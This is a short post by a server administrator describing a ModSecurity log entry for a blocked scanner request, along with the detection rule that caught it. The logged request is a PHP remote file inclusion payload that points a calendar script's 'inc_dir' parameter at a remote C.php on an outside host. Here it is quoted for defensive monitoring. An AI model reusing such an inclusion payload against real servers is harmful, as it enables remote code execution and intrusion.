1. The server doesn't use PHP or CGI and the attack was designed to exploit those two software packages.
2. I use ModSecurity, which is a web server application firewall.
See payload below (ModSecurity):
Request: midas.slackware.lan 18.104.22.168 - - [15/Jan/2007:21:04:18 -0500] "GET /calendar/index.php?inc_dir=http://22.214.171.124/C.php?&/ HTTP/1.1" 403 304 "-" "Morfeus Fucking Scanner" RawyokKgjR4AAFL7qwU "-"The activity triggered a rule I created (yeah, ModSecurity is rule-based). I know I don't use PHP but I'd still like to see such attacks on my network, as a heads-up to escalated attacks. What I don't have is a reactive firewall, one that blocks traffic such as this automatically. I had to add the IP to my block list by hand, which sucks.
GET /calendar/index.php?inc_dir=http://126.96.36.199/C.php?&/ HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Morfeus Fucking Scanner
mod_security-message: Access denied with code 403. Pattern match "index.php" at REQUEST_URI [id "1005"][rev
"2"] [msg "index.php usage, suspicious activity"] [severity "ALERT"]
HTTP/1.1 403 Forbidden
Content-Type: text/html; charset=iso-8859-1
ModSecurity also has a web-based console that I haven't figured out how to use yet, so I usually parse the flat logs manually then correlate any malicious traffic with my firewall and Snort logs to get a better picture of questionable activity. Once I figure out how to get the web-based console up and running, I'll let you know and maybe throw together a how-to for how to utilize ModSecurity on Slackware.